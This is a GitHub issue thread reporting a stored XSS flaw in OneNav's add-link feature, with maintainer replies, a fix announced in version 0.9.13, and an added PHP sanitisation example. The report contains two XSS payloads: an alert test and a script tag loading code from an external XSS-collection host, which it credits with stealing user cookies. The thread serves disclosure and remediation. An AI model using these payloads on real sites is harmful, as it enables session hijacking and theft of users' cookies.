OneNav's add link function exists xss vul #26

Closed
alex123-2star opened this issue Aug 5, 2021 · 8 comments
Labels
bug Something isn't working

Comments

@alex123-2star

add link function path
input xss payload 1: "><script>alert("XSS")</script>
click the 添加 (Add) button
alert xss success
input xss payload 2: <sCRiPt sRC=//xss.pt/NZ9j></sCrIpT>
Get user cookie success

@helloxz
Owner

helloxz commented Aug 5, 2021

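Hello, and thank you for the feedback. At present the admin backend indeed does no XSS filtering. Ordinarily, a normal user would not use their backend privileges to inject XSS code into their own site, unless the account and password have been leaked. Still, it does count as a potential risk, and XSS filtering and validation will be added later.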
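
One way to do the filtering and validation mentioned above, as an added example in PHP that is not OneNav's own code and not part of any comment in this thread. The function names and the `title`/`url`/`description` field names are assumptions; the code allow-lists http(s) URLs and HTML-encodes every stored field at render time.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (assumed names, not OneNav's code): validate the URL on
// input, then HTML-encode every stored field where it is rendered.

/** Return the URL if it is an absolute http(s) URL, otherwise null. */
function validate_link_url(string $url): ?string
{
    $url = trim($url);
    if (strlen($url) > 2048 || filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    // Allow-list schemes so javascript: or data: URLs never reach an href.
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

/** Encode text for an element body or a quoted attribute value. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render one link; the keys title, url and description are assumed. */
function render_link(array $link): string
{
    $title = e((string) ($link['title'] ?? ''));
    $url = validate_link_url((string) ($link['url'] ?? ''));
    if ($url === null) {
        return '<span class="invalid-link">' . $title . '</span>';
    }
    return sprintf(
        '<a href="%s" title="%s" rel="noopener noreferrer">%s</a>',
        e($url),
        e((string) ($link['description'] ?? '')),
        $title
    );
}

// Constructed input: the first payload from this report submitted as the title.
$submitted = [
    'title'       => '"><script>alert("XSS")</script>',
    'url'         => 'https://example.com/',
    'description' => 'test entry',
];
// Quotes and angle brackets are emitted as entities, so the title displays as text.
echo render_link($submitted), PHP_EOL;
```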

@helloxz helloxz added the enhancement New feature or request label Aug 5, 2021
@nu11secur1ty

nu11secur1ty commented Aug 7, 2021

Yes, there is a big problem:
Proof: https://streamable.com/ubtzio, so please fix the add_link feature on your already created account, dear friend.
So, if you have some malicious user with admin rights or whatever, the game will be over. In another scenario, some malicious user will be sending an email with malicious execution code, and again, the game is over.
Fix:
You must sanitize these two environments, the user and the admin account platforms, no matter what happens, and you must create special checks for the add_link feature when the users are using POST or GET parameters. More: You don't have any HTTP or HTTPS filter for inbound and outbound traffic, and this is a BIG problem =)
Love and Peace KR @nu11secur1ty

@OS-WS

OS-WS commented Aug 8, 2021

Hi @helloxz ,
Are you planning to fix this issue?

@helloxz
Owner

helloxz commented Aug 8, 2021

@nu11secur1ty @OS-WS @alex123-2star Hello everyone, this issue is expected to be fixed in the next version, thanks for your feedback.

@helloxz helloxz added bug Something isn't working and removed enhancement New feature or request labels Aug 8, 2021
@nu11secur1ty

Ok tnx and BR

@helloxz
Owner

helloxz commented Feb 16, 2022

This vulnerability has been fixed in 0.9.13. Thank you for your support.

@helloxz helloxz closed this as completed Feb 16, 2022
@nu11secur1ty

<3
